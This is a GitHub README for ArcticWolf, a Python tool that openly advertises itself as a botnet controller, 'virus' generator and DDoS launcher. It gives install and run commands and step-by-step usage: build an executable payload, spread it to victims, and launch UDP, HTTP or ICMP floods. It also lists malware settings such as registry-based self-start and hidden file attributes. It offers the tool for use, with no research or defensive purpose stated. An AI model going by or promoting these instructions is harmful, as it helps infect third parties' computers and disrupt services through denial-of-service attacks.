/ArcticWolf

A botnet controller for Ddos attacks using frp (without server)

Primary LanguagePythonMIT LicenseMIT

ArcticWolf🐺 -- use a computer and a frp to set up your botnet and launch ddos attacks!

The easy and fast way to organize a botnet for ddos and launch an attack

virus generater, botnet controller and DDOS attacker under python3

📸Highlights

  • 🛎️No server required
  • 😜Very easy to use
  • 🌞Highly customized viruses
  • 🌐Able to launch UDPflood, HTTPflood, ICMPflood attacks

📕Getting started

🥰Requirements

command to install all :

pip install pyinstaller==5.13.2 pywin32==306

👋Install & Start

  • Install
git clone https://github.com/DWL-stu/ArcticWolf.git
  • Start
python main.py

😈Usage

  • Input your ip and port (ex:127.0.0.1, 1234)

  • Get the public network ip and port using frp and input it (ex:1.2.3.4, 12345)

  • generate .py virus (using command : gen_py or gen_exe) and spread the virus

  • use ddos attack method to attack!

🦠virus settings

  • set your own config at ./Data/settings.json

    • Threads_num : number of threads

    • Attribute_hide : file attribute hide

    • self_starting : Modify the registry to implement self-start

    • Password : Password to connect the botnet

    • etc.

  • The log will be recorded in ./Data/History.config

🦸Maintainers

@D0WE1L1N.

🤝Reports

Please send bug reports and feature requests through github issue tracker. ArcticWolf is currently under development now and it's open to any constructive suggestions.

📃License

The ArcticWolf attack script is released under MIT license.

⭐️Leave a star if you like this project